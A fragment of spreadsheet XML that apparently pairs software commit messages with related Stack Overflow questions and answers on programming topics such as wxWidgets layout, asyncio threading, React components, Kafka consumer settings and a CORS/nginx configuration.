So my question is: Is there some special trick with which one can achieve something like transparent sharding of the web tier (not the database tier as done commonly)? As long as the cookie isn't inspected there is no way to know which application server is holding this session.
Edit: I realized that there is only a need for transparency, if there is a need for the site to be spidered and bookmarked. E.g. if the site is a mere web app, something like a plane or train ticket reservation system, there should be no problem with just redirecting the users to specific clusters of web servers behind different urls, e.g. a17.ticketreservation.com. In this specific case, it would be feasible to just use multiple clusters of application servers, each behind his own load balancer.
Interestingly, I did not find a site which uses this kind of concept.
Edit: I found this concept [external-link] at [external-link], where the discussion refers to an article by Lei Zhu named [external-link]. Lei Zhu uses cross scripting to do this client side load balancing transparently.
Even if there are drawbacks, like bookmarking, xss, etc, I do think that this sounds like a extremely good idea for certain special situations, namely almost content-free web applications, which are not needed to be spidered or bookmarked (e.g. ticket reservation systems or something like that). Then there is no need to do the load balancing transparently.
There could be a simple redirect from the main site to the server, e.g. a redirect from www.ticketreservation.com to a17.ticketreservation.com. From there on the user stays at the server a17. a17 is not a server, but a cluster itself, by which redundancy could be achieved.
The initial redirect server could itself be a cluster behind a load balancer. This way, a really high scalability could be achieved, as the primary load balancer behind www is only hit once at the beginning of each session.
Of course, the redirect to different urls looks extremely nasty, but with mere web applications (which do not need to be spidered, deep-linked or deep-bookmarked anyway), this should be only an optical problem for the user?
The redirect-cluster could poll the load of the application clusters and adapt the redirects accordingly, thus achieving balancing and not mere load distribution.
</t>
  </si>
  <si>
    <t>C191</t>
  </si>
  <si>
    <t>Added Calculator UI Framework,
/* This was adapted froma  post from New Pagodi on 2021/06/01 on Stackoverflow forum post here:
 https://stackoverflow.com/questions/67787519/wxwidgets-gridsizer-puts-all-buttons-in-the-same-position</t>
  </si>
  <si>
    <t>To make the grid sizer layout the buttons, you need to either
set it to be the sizer for a window or
add it to another sizer.
Assuming the code above is from the constructor of your main frame window, you would set grid to be the sizer for the frame like this
SetSizer(grid);
On the other hand, if you have other controls in the frame and need to add grid to another sizer, you could do that something like this:
otherSizer-&gt;Add(grid,wxSizerFlags(0));
Obviously, 'otherSizer' should be replaced with the name of the other sizer.  There are many options that can be used with wxSizerFlags to get the exact layout you want.
In addition, as mentioned above, it's sometimes helpful to end all the code the creates and organizes the controls your using with a call to the Layout() method.
Another tactic you can use is to have a single panel be the only child of the frame and then set a sizer for the panel.  This works because in wxWidgets whenever a top level window such as a frame has a single child, that child is automatically sized to fill all of the available area.
Using this technique, a layout with a text control along the top and the grid underneath it could be created like this:
// Create the controls
wxPanel* bgPanel = new wxPanel(this, wxID_ANY);
wxTextCtrl* text = new wxTextCtrl(bgPanel, wxID_ANY);
wxGridSizer *grid = new wxGridSizer(length, length, 0, 0);
wxButton *buttons[length*length];
for (int i=0; i&lt;length*length; i++){
    buttons[i] = new wxButton(bgPanel, wxID_ANY);
    grid-&gt;Add(buttons[i], 1, wxEXPAND | wxALL);
    if (mineField[i]){
        Bind(wxEVT_BUTTON, &amp;MainWindow::isMine, this);
    } else {
        Bind(wxEVT_BUTTON, &amp;MainWindow::notMine, this);
    }
}
// Create a sizer for the panel and add the text control and grid to it.
wxBoxSizer* mainSizer = new wxBoxSizer(wxVERTICAL);
mainSizer-&gt;Add(text, wxSizerFlags(0).Expand().Border(wxALL));
mainSizer-&gt;Add(grid,wxSizerFlags(1).Expand().Border(wxLEFT|wxRIGHT|wxBOTTOM));
bgPanel-&gt;SetSizer(mainSizer);</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a CMake project where I want to execute a Python script as part of the install target to automatically set a global keyboard shortcut for the target that gets installed.&lt;/p&gt;
&lt;p&gt;The script itself works when started from the terminal but when I add it to the install target like so&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;install(
  CODE
  &amp;quot;execute_process(
    COMMAND  /usr/bin/python3 \&amp;quot;${CMAKE_SOURCE_DIR}/tools/enable-shutdown-menu-keybind.py\&amp;quot; --command \&amp;quot;${CMAKE_INSTALL_FULL_BINDIR}/shutdown_menu\&amp;quot;
    RESULT_VARIABLE _ENABLE_SHUTDOWN_MENU_KEYBIND_RESULT
  )
  if (_ENABLE_SHUTDOWN_MENU_KEYBIND_RESULT GREATER 0)
    message(FATAL_ERROR \&amp;quot;Enabling shutdown-menu keybinds failed with exit code \${_ENABLE_SHUTDOWN_MENU_KEYBIND_RESULT}\&amp;quot;)
  endif()&amp;quot;
  CONFIGURATIONS Release RelWithDebInfo MinSizeRel
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;it suddenly fails.
In particular it seems to fail when getting the list of custom keybinds from &lt;code&gt;org.gnome.settings-daemon.plugins.media-keys&lt;/code&gt; like you would with &lt;code&gt;gsettings get org.gnome.settings-daemon.plugins.media-keys custom-keybindings&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I don't think it's a problem resulting from running cmake with elevated rights in order to install the program as running the script from a terminal using sudo works as expected aswell.&lt;/p&gt;
&lt;p&gt;What i've tried so far:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;changing the command to &lt;code&gt;/usr/bin/bash -c \&amp;quot;/usr/bin/python3 '${CMAKE_SOURCE_DIR}/tools/enable-shutdown-menu-keybind.py' --command '${CMAKE_INSTALL_FULL_BINDIR}/shutdown_menu'\&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;adding &lt;code&gt;env GNOME_SHELL_SESSION_MODE='$ENV{GNOME_SHELL_SESSION_MODE}'&lt;/code&gt; before the command (yes I made sure this had the desired effect)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;My guess is that it has something todo with the environment (which is why I tried the second point) but I'm not sure what I would be missing.&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;I just thought of something else I could test. I temporarily set the &lt;code&gt;CMAKE_INSTALL_PREFIX&lt;/code&gt; to a directory owned by me and ran the cmake install command without elevated rights. To my surprise the script ran prefectly fine.&lt;/p&gt;
&lt;p&gt;I guess this means that it has something to do with running cmake as root. In case its important, i elevate cmake using pkexec.&lt;/p&gt;
&lt;p&gt;EDIT 2:&lt;/p&gt;
&lt;p&gt;It seems I was wrong about sudo - it fails there too. It did work when I launched the script using a VSCode launch configuration with the &lt;code&gt;&amp;quot;sudo&amp;quot;: true&lt;/code&gt; option tho.&lt;/p&gt;
&lt;p&gt;EDIT 3:&lt;/p&gt;
&lt;p&gt;I've expanded the install function call to the following:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;
install(
  CODE
  &amp;quot;if (DEFINED ENV{PKEXEC_UID})
    set(UID \$ENV{PKEXEC_UID})
  elseif(DEFINED ENV{SUDO_UID})
    set(UID \$ENV{SUDO_UID})
  else()
    message(FATAL_ERROR \&amp;quot;Unable to determine callee UID.\&amp;quot;)
  endif()
  execute_process(
    COMMAND sudo -H -u \&amp;quot;#\${UID}\&amp;quot; env DISPLAY=$ENV{DISPLAY} /usr/bin/python3 \&amp;quot;${CMAKE_SOURCE_DIR}/tools/enable-shutdown-menu-keybind.py\&amp;quot; --command \&amp;quot;${CMAKE_INSTALL_FULL_BINDIR}/shutdown_menu\&amp;quot;
    RESULT_VARIABLE _ENABLE_SHUTDOWN_MENU_KEYBIND_RESULT
  )
  if (_ENABLE_SHUTDOWN_MENU_KEYBIND_RESULT GREATER 0)
    message(FATAL_ERROR \&amp;quot;Enabling shutdown-menu keybinds failed with exit code \${_ENABLE_SHUTDOWN_MENU_KEYBIND_RESULT}\&amp;quot;)
  endif()&amp;quot;
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which leads to the program getting executed and reporting to have set the values. But the changes do not seem to get applied, as the keybind shows up neither in dconf, the gnome-command-center nor gsettings.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C192</t>
  </si>
  <si>
    <t>Heartbeat watcher: Fix for async issues, when dispatcher is created in a non-main thread.
Read
(https://stackoverflow.com/questions/55656726/why-asyncio-get-event-loop-method-checks-if-the-current-thread-is-the-main-threa)[this]
Bumped version to 0.1.15 along with it</t>
  </si>
  <si>
    <t>For convenience, asyncio supports automatically creating an event loop without having to go through calls to new_event_loop() and set_event_loop(). As the event loop is moderately expensive to create, and consumes some OS resources, it's not created automatically on import, but on-demand, specifically on the first call to get_event_loop(). (This feature is mostly obsoleted by asyncio.run which always creates a new event loop, and then the auto-created one can cause problems.)
This convenience, however, is reserved for the main thread - any other thread must set the event loop explicitly. There are several possible reasons for this:
preventing confusion - you don't want an accidental call to get_event_loop() from an arbitrary thread to appropriate the "main" (auto-created) event loop for that thread;
some asyncio features work best when or require that the event loop is run in the main thread - for example, subprocesses1 and signal handling.
These problems could also be avoided by automatically creating a new event loop in each thread that invokes get_event_loop(), but that would make it easy to accidentally create multiple event loops whose coroutines would be unable to communicate with each other, which would go against the design of asyncio. So the remaining option is for the code to special-case the main thread, encouraging developers to use that thread for executing asyncio code.
1 Beginning with Python 3.8, subprocesses may be spawned from event loop running in a thread other than the main thread.</t>
  </si>
  <si>
    <t>Heartbeat watcher: Fix for async issues, when dispatcher is created i
n a non-main thread.
Read
(https://stackoverflow.com/questions/55656726/why-asyncio-get-event-loop-method-checks-if-the-current-thread-is-the-main-threa)[this]
Bumped version to 0.1.15 along with it</t>
  </si>
  <si>
    <t xml:space="preserve">I'm using Entity Framework O/R mapper from Microsoft and using entity classes (generated classes that are mapped to DB objects) as a business objects. 
Is this OK? Please state your cons or pros. What to do in a case of WCF communication between business layer and presentation, how to send those objects as data members?
</t>
  </si>
  <si>
    <t>C193</t>
  </si>
  <si>
    <t>Add a new page for how to communicate between component (...) Details: I think it would be helpful to have a page that explains how to communicate between components. This could include a best practice example of a communication between two components that don't have a parent-child relationship (...) References https://stackoverflow.com/questions/21285923/how-can-i-communicate-between-related-react-components\#comment45951998\_21285923.</t>
  </si>
  <si>
    <t>The best approach would depend on how you plan to arrange those components. A few example scenarios that come to mind right now:
&lt;Filters /&gt;
is a child component of
&lt;List /&gt;
Both
&lt;Filters /&gt;
and
&lt;List /&gt;
are children of a parent component
&lt;Filters /&gt;
and
&lt;List /&gt;
live in separate root components entirely.
There may be other scenarios that I'm not thinking of. If yours doesn't fit within these, then let me know. Here are some very rough examples of how I've been handling the first two scenarios:
Scenario #1
You could pass a handler from
&lt;List /&gt;
to
&lt;Filters /&gt;
, which could then be called on the
onChange
event to filter the list with the current value.
JSFiddle for #1 →
/** @jsx React.DOM */
var Filters = React.createClass({
  handleFilterChange: function() {
    var value = this.refs.filterInput.getDOMNode().value;
    this.props.updateFilter(value);
  },
  render: function() {
    return &lt;input type="text" ref="filterInput" onChange={this.handleFilterChange} placeholder="Filter" /&gt;;
  }
});
var List = React.createClass({
  getInitialState: function() {
    return {
      listItems: ['Chicago', 'New York', 'Tokyo', 'London', 'San Francisco', 'Amsterdam', 'Hong Kong'],
      nameFilter: ''
    };
  },
  handleFilterUpdate: function(filterValue) {
    this.setState({
      nameFilter: filterValue
    });
  },
  render: function() {
    var displayedItems = this.state.listItems.filter(function(item) {
      var match = item.toLowerCase().indexOf(this.state.nameFilter.toLowerCase());
      return (match !== -1);
    }.bind(this));
    var content;
    if (displayedItems.length &gt; 0) {
      var items = displayedItems.map(function(item) {
        return &lt;li&gt;{item}&lt;/li&gt;;
      });
      content = &lt;ul&gt;{items}&lt;/ul&gt;
    } else {
      content = &lt;p&gt;No items matching this filter&lt;/p&gt;;
    }
    return (
      &lt;div&gt;
        &lt;Filters updateFilter={this.handleFilterUpdate} /&gt;
        &lt;h4&gt;Results&lt;/h4&gt;
        {content}
      &lt;/div&gt;
    );
  }
});
React.renderComponent(&lt;List /&gt;, document.body);
Scenario #2
Similar to scenario #1, but the parent component will be the one passing down the handler function to
&lt;Filters /&gt;
, and will pass the filtered list to
&lt;List /&gt;
. I like this method better since it decouples the
&lt;List /&gt;
from the
&lt;Filters /&gt;
.
JSFiddle for #2 →
/** @jsx React.DOM */
var Filters = React.createClass({
  handleFilterChange: function() {
    var value = this.refs.filterInput.getDOMNode().value;
    this.props.updateFilter(value);
  },
  render: function() {
    return &lt;input type="text" ref="filterInput" onChange={this.handleFilterChange} placeholder="Filter" /&gt;;
  }
});
var List = React.createClass({
  render: function() {
    var content;
    if (this.props.items.length &gt; 0) {
      var items = this.props.items.map(function(item) {
        return &lt;li&gt;{item}&lt;/li&gt;;
      });
      content = &lt;ul&gt;{items}&lt;/ul&gt;
    } else {
      content = &lt;p&gt;No items matching this filter&lt;/p&gt;;
    }
    return (
      &lt;div className="results"&gt;
        &lt;h4&gt;Results&lt;/h4&gt;
        {content}
      &lt;/div&gt;
    );
  }
});
var ListContainer = React.createClass({
  getInitialState: function() {
    return {
      listItems: ['Chicago', 'New York', 'Tokyo', 'London', 'San Francisco', 'Amsterdam', 'Hong Kong'],
      nameFilter: ''
    };
  },
  handleFilterUpdate: function(filterValue) {
    this.setState({
      nameFilter: filterValue
    });
  },
  render: function() {
    var displayedItems = this.state.listItems.filter(function(item) {
      var match = item.toLowerCase().indexOf(this.state.nameFilter.toLowerCase());
      return (match !== -1);
    }.bind(this));
    return (
      &lt;div&gt;
        &lt;Filters updateFilter={this.handleFilterUpdate} /&gt;
        &lt;List items={displayedItems} /&gt;
      &lt;/div&gt;
    );
  }
});
React.renderComponent(&lt;ListContainer /&gt;, document.body);
Scenario #3
When the components can't communicate between any sort of parent-child relationship, the
documentation recommends setting up a global event system
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a Kotlin Multiplatform Project (android and desktop(windows)) that uses Coil 3 for loading images in a Jetpack Compose UI. My goal is to refresh an image when the user clicks a refresh button. However, Iâ€™ve encountered an issue where Coil serves the cached image instead of fetching a new one.
Hereâ€™s the current code snippet:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; Box(
                    modifier = Modifier.fillMaxWidth(),
                    contentAlignment = Alignment.Center
                ) {
                var showImage by remember { mutableStateOf(true) }
                if (showImage) {
                    sampleImageUrl?.let { url -&amp;gt;
                        AsyncImage(
                            model = url,
                            contentDescription = &amp;quot;Sample Image&amp;quot;,
                            contentScale = ContentScale.FillBounds,
                            clipToBounds = false,
                            modifier = Modifier
                                .fillMaxWidth()
                                .height(180.dp)
                                .clip(RoundedCornerShape(48.dp))
                                .padding(8.dp, 8.dp)
                        )
                    }
                }
                IconButton(
                    onClick = {
                        showImage = false // Remove image from composition
                        screenModel.fetchSampleData()
                        showImage = true  // Re-add after recomposition
                    },
                    modifier = Modifier
                        .align(Alignment.CenterEnd)
                        .padding(end = 8.dp)
                        .background(Color.Black.copy(alpha = 0.5f), CircleShape)
                        .size(36.dp)
                ) {
                    Icon(
                        imageVector = Icons.Default.Refresh,
                        contentDescription = &amp;quot;Refresh&amp;quot;,
                        tint = Color.White
                    )
                }
            }
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Is there a way to force Coil 3 to clear cache?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Can I achieve this behavior in a KMP-friendly way, without relying on Android-specific APIs like context?&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>C194</t>
  </si>
  <si>
    <t>make heartbeat also keep server alive
https://stackoverflow.com/questions/43842793
https://stackabuse.com/encoding-and-decoding-base64-strings-in-node-js
https://stackoverflow.com/a/6182519</t>
  </si>
  <si>
    <t>A solution without dependencies.
Node
headers.set('Authorization', 'Basic ' + Buffer.from(username + ":" + password).toString('base64'));
Browser
headers.set('Authorization', 'Basic ' + btoa(username + ":" + password));</t>
  </si>
  <si>
    <t>make heartbeat also keep server alive
https://stackoverflow.com/questions/43842793
https://stackabuse.com/encoding-and-decoding-base64-strings-in-node-js
https://stackoverflow.com/a/6182520</t>
  </si>
  <si>
    <t>Buffers can be used for taking a string or piece of data and doing Base64 encoding of the result. For example:
&gt; console.log(Buffer.from("Hello World").toString('base64'));
SGVsbG8gV29ybGQ=
&gt; console.log(Buffer.from("SGVsbG8gV29ybGQ=", 'base64').toString('ascii'))
Hello World
The Buffer constructor is a global object, so no require is needed. Buffers created with strings can take an optional encoding parameter to specify what encoding the string is in. The available toString and Buffer constructor encodings are as follows:
'ascii' - for 7 bit ASCII data only. This encoding method is very fast, and will strip the high bit if set.
'utf8' - Multi byte encoded Unicode characters. Many web pages and other document formats use UTF-8.
'ucs2' - 2-bytes, little endian encoded Unicode characters. It can encode only BMP(Basic Multilingual Plane, U+0000 - U+FFFF).
'base64' - Base64 string encoding.
'binary' - A way of encoding raw binary data into strings by using only the first 8 bits of each character. This encoding method is deprecated and should be avoided in favor of Buffer objects where possible. This encoding will be removed in future versions of Node.</t>
  </si>
  <si>
    <t xml:space="preserve">I have visual studio 2008 installed on my PC. Can anyone tell me what should I get installed so that I can start with the MVC architecture. I am very much confused about the .NET versions required for MVC architecture.
</t>
  </si>
  <si>
    <t>C195</t>
  </si>
  <si>
    <t>kafka: Always poll within the required interval
Kafka requires a that user threads poll the queue in _addition_ to a separate
heartbeat thread that keeps the cluster aware of the client. The idea [seems to
be][1] that if a user thread is too overwhelmed to poll occassionally then kafka
should rebalance things.
Different versions of kafka have the default at different values, but the
current default is 5 minutes, so we set it to that.
Then, we poll once per minute just to be really sure that we are never evicted.
[1]: https://stackoverflow.com/a/43992308/25616</t>
  </si>
  <si>
    <t>Assuming we are talking about Kafka 0.10.1.0 or upwards where each consumer instance employs two threads to function. One is user thread from which
poll
is called; the other is heartbeat thread that specially takes care of heartbeat things.
session.timeout.ms
is for heartbeat thread. If coordinator fails to get any heartbeat from a consumer before this time interval elapsed, it marks consumer as failed and triggers a new round of rebalance.
max.poll.interval.ms
is for user thread. If message processing logic is too heavy to cost larger than this time interval, coordinator explicitly have the consumer leave the group and also triggers a new round of rebalance.
heartbeat.interval.ms
is used to have other healthy consumers aware of the rebalance much faster. If coordinator triggers a rebalance, other consumers will only know of this by receiving the heartbeat response with
REBALANCE_IN_PROGRESS
exception encapsulated. Quicker the heartbeat request is sent, faster the consumer knows it needs to rejoin the group.
Suggested values:
session.timeout.ms
:  a relatively low value, 10 seconds for instance.
max.poll.interval.ms
: based on your processing requirements
heartbeat.interval.ms
: a relatively low value, better 1/3 of the
session.timeout.ms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem when I switch version in the swagger UI. I see endpoints not related to that version they are associated with. For example I have 3 endpoints under version 1 but 1 endpoint under version 2. But the UI shows the 2 endpoints under version 1 as version 2.&lt;/p&gt;
&lt;p&gt;Is there a way to only show the 1 endpoint set up in version 2?&lt;/p&gt;
&lt;p&gt;my routes&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public override void AddRoutes(IEndpointRouteBuilder app)
{
_vs = app.NewApiVersionSet()
    .HasApiVersion(new ApiVersion(1))
    .HasApiVersion(new ApiVersion(2))
    .Build();
app.MapPost(&amp;quot;/{friendlyProcedureName}&amp;quot;, RunProcess)
    .WithApiVersionSet(_vs)
app.MapGet(&amp;quot;/{friendlyProcedureName}/Params&amp;quot;, GetParamsByName)
    .WithApiVersionSet(_vs)
app.MapGet(&amp;quot;/&amp;quot;,  GetAllProcedures)
    .WithApiVersionSet(_vs)
app.MapGet(&amp;quot;/&amp;quot;, Mew)
    .WithApiVersionSet(_vs)
    .WithOpenApi()
    .MapToApiVersion(2);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I assume I need something like this but unsure how I can read from the data from the routes.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  options.DocInclusionPredicate((version, desc) =&amp;gt;
  {
  });
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C196</t>
  </si>
  <si>
    <t>#9 feat: implement ScheduledClientAdapter class and connect adapter w
ith concat adapter
&lt;RecyclerViewAdapter Item with DataBinding&gt;
separation of concerns
&lt;Data Binding Image Resource&gt;
ref: https://stackoverflow.com/questions/35809290/set-drawable-resource-id-in-androidsrc-for-imageview-using-data-binding-in-andr</t>
  </si>
  <si>
    <t>Answer as of Nov 10 2016
Splash's comment has highlighted that it is not necessary to use a custom property type (like imageResource). We can instead create multiple methods for android:src like so:
public class DataBindingAdapters {
    @BindingAdapter("android:src")
    public static void setImageUri(ImageView view, String imageUri) {
        if (imageUri == null) {
            view.setImageURI(null);
        } else {
            view.setImageURI(Uri.parse(imageUri));
        }
    }
    @BindingAdapter("android:src")
    public static void setImageUri(ImageView view, Uri imageUri) {
        view.setImageURI(imageUri);
    }
    @BindingAdapter("android:src")
    public static void setImageDrawable(ImageView view, Drawable drawable) {
        view.setImageDrawable(drawable);
    }
    @BindingAdapter("android:src")
    public static void setImageResource(ImageView imageView, int resource){
        imageView.setImageResource(resource);
    }
}
Old Answer
You could always try to use an adapter:
public class DataBindingAdapters {
    @BindingAdapter("imageResource")
    public static void setImageResource(ImageView imageView, int resource){
        imageView.setImageResource(resource);
    }
}
You can then use the adapter in your XML content like so:
&lt;ImageView
    android:id="@+id/recipe_image_view"
    android:layout_width="match_parent"
    android:layout_height="200dp"
    android:scaleType="centerCrop"
    imageResource="@{recipe.imageResource}" /&gt;
Be sure to notice that the name within the XML content matches the BindingAdapter annotation (imageResource).
The DataBindingAdapters class doesn't need to be declared anywhere in particular. The DataBinding mechanics will find it no matter (I believe).</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in using Xaml with expression blend for creating user interfaces in an application. However, because of the limitations of the target architecture, I cannot use WPF or C#.
So, what I am interested in is in any examples / existing projects or advice from anyone who has experiance of this technology on the use of Xaml in it's "Pure" form as a specification language not tied to WPF.
Specific questions:
1) Is it possible to use Blend + Xaml without the WPF elements, or without C# backing classes?
2) Are there any other implementations of Xaml parsers etc. which use different architectures, and can they work with blend or similar tools.
3) Are there alternative editor / designer tools which can help in this situation?
I am aware of the MyXaml and MycroXaml projects, and have found a lot of resources on the web about Xaml, but 99% of it relates directly to WPF. This is fine for understanding the concepts of Xaml, but doesn't help with the implimentation I need.
Many thanks!
</t>
  </si>
  <si>
    <t>C197</t>
  </si>
  <si>
    <t>use opengl approach to support newer Qt
- https://stackoverflow.com/a/26437595</t>
  </si>
  <si>
    <t>Try QQuickWidget:
#include &lt;QtWidgets&gt;
#include &lt;QQuickWidget&gt;
class Widget : public QWidget
{
    Q_OBJECT
public:
    Widget() {
        setStyleSheet("background-color: 'grey';");
        mQQuickWidget = new QQuickWidget(QUrl(QStringLiteral("main.qml")), this);
        mQQuickWidget-&gt;setResizeMode(QQuickWidget::SizeRootObjectToView);
        mQQuickWidget-&gt;setAttribute(Qt::WA_AlwaysStackOnTop);
        mQQuickWidget-&gt;setClearColor(Qt::transparent);
        mQQuickWidget-&gt;resize(400, 400);
        mQQuickWidget-&gt;raise();
    }
private:
    QQuickWidget *mQQuickWidget;
};
int main(int argc, char** argv)
{
    QApplication app(argc, argv);
    Widget widget;
    widget.resize(400, 400);
    widget.show();
    return app.exec();
}
#include "main.moc"
main.qml:
import QtQuick 2.2
Item {
    Text {
        text: "Qt Quick Text"
        font.pixelSize: 32
        anchors.centerIn: parent
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The Problem:
getProfile most of times go to PreFlight (but sometimes work right).&lt;/p&gt;
&lt;p&gt;Frontend Host: AWS S3/CloudFront and Backend Host: AWS EC2&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;FRONTEND&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;client.js&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import axios from &amp;quot;axios&amp;quot;;
const client = axios.create({
  baseURL: &amp;quot;https://api.domain .com&amp;quot;,
});
export default client;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;getProfile.js&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export const getProfile = async (token) =&amp;gt; {
    try {
        const { data } = await client.get('/profile', {
            headers: {
                Authorization: `Bearer ${token}`
            }
        });        
        return data
    } catch (error) {
        const { response } = error;
        if(response?.data){
            return response.data;
        }
        return { error: error.message || error };
    }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;BACKEND&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;index.js&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;require('dotenv').config();
require('./db');
const express = require('express');
const cors = require('cors');
const port = 3001;
const mainRouter = require('./routes/main');
const app = express();
app.set('trust proxy', 1);
const allowedOrigins = [
  &amp;quot;http://domain .com&amp;quot;,
  &amp;quot;https://domain .com&amp;quot;,
  &amp;quot;https://www.domain .com&amp;quot;,
  &amp;quot;http://api.domain .com&amp;quot;,
  &amp;quot;https://api.domain .com&amp;quot;,
  &amp;quot;wss://api.domain .com&amp;quot;,
];
app.use((req, res, next) =&amp;gt; {
  cors({
    origin: function (origin, callback) {
      console.log(&amp;quot;Incoming request origin:&amp;quot;, origin);
      if (!origin || allowedOrigins.includes(origin)) {
        callback(null, true);
      } else {
        console.error(&amp;quot;âŒ Blocked CORS request from:&amp;quot;, origin);
        callback(new Error(&amp;quot;CORS not allowed&amp;quot;));
      }
    },
    credentials: true
  })(req, res, next);
});
app.use(express.json());
app.use(mainRouter);
app.use((err, req, res, next) =&amp;gt; {
  console.error(err);
  res.status(err.status || 500).json({ error: err.message || &amp;quot;Internal Server Error&amp;quot; });
});
app.get(&amp;quot;/&amp;quot;, (req, res) =&amp;gt; {
  res.send(&amp;quot;âœ… API is working!&amp;quot;);
});
app.get(&amp;quot;/health&amp;quot;, (req, res) =&amp;gt; {
  res.status(200).send(&amp;quot;OK&amp;quot;);
});
app.listen(port, &amp;quot;0.0.0.0&amp;quot;, () =&amp;gt; {
  console.log(`âœ… Website 1 Backend running on https://0.0.0.0:${port} (accessible externally)`);
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;AWS&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;CloudFront&amp;gt;Distributions&amp;gt;Distribution_ID
Behavior:
&lt;a href="https://i.sstatic.net/pzIEsslf.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/pzIEsslf.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/oT2p8OhA.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/oT2p8OhA.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;About AWS EC2 is 100% Healthy&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;NGINX.CONFIG:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   server {
    listen 80;
    server_name api.domain .com;
    location / {
    proxy_pass http://localhost:3001;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header X-Forwarded-Proto $scheme;
    proxy_set_header Cookie $http_cookie;
    proxy_set_header Origin $http_origin;
    proxy_pass_request_headers on;
    add_header Set-Cookie &amp;quot;SameSite=None; Secure&amp;quot;;
    add_header Content-Security-Policy &amp;quot;default-src 'self'; connect-src 'self' wss://api.domain .com&amp;quot;;
    }
    location /ws/ {
    proxy_pass http://localhost:9001;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection &amp;quot;Upgrade&amp;quot;;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header Cookie $http_cookie;
    proxy_set_header Sec-WebSocket-Protocol $http_sec_websocket_protocol;
    proxy_set_header Origin $http_origin;
    add_header Set-Cookie &amp;quot;SameSite=None; Secure&amp;quot;;
    }
    }
    server {
            listen 443 ssl;
            server_name api.domain .com;
            ssl_certificate /etc/letsencrypt/live/api.domain .com/fullchain.pem;
            ssl_certificate_key /etc/letsencrypt/live/api.domain .com/privkey.pem;
            location /ws/ {
                proxy_pass http://localhost:9001;
                proxy_http_version 1.1;
                proxy_set_header Upgrade $http_upgrade;
                proxy_set_header Connection &amp;quot;Upgrade&amp;quot;;
                proxy_set_header Host $host;
                proxy_set_header X-Real-IP $remote_addr;
                proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                proxy_set_header Cookie $http_cookie;
                proxy_set_header Sec-WebSocket-Protocol $http_sec_websocket_protocol;
                add_header Set-Cookie &amp;quot;SameSite=None; Secure&amp;quot;;
            }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;BACKEND TERMINAL ON LOAD BACKEND DOMAIN:
100% WORKING&lt;/p&gt;
&lt;p&gt;BACKEND TERMINAL ON LOAD WEBSITE:
EACH TIME RELOAD WEBSITE-&amp;gt;Incoming request origin: https://www. domain .com&lt;/p&gt;
&lt;p&gt;after auto in terminal get:
Incoming request origin: undefined
Incoming request origin: undefine...&lt;/p&gt;
&lt;p&gt;Also I try:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PS C:\Users\STEFA&amp;gt; wscat -c https://api.domain.com/profile/ -H &amp;quot;Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...&amp;quot;
error: Unexpected server response: 200
&amp;gt;
PS C:\Users\STEFA&amp;gt; wscat -c https://api.domain.com/profile/ -H &amp;quot;Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...&amp;quot;
error: Unexpected server response: 200
&amp;gt;
PS C:\Users\STEFA&amp;gt; wscat -c https://api.domain.com/profile/ -H &amp;quot;Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...&amp;quot;
Connected (press CTRL+C to quit)
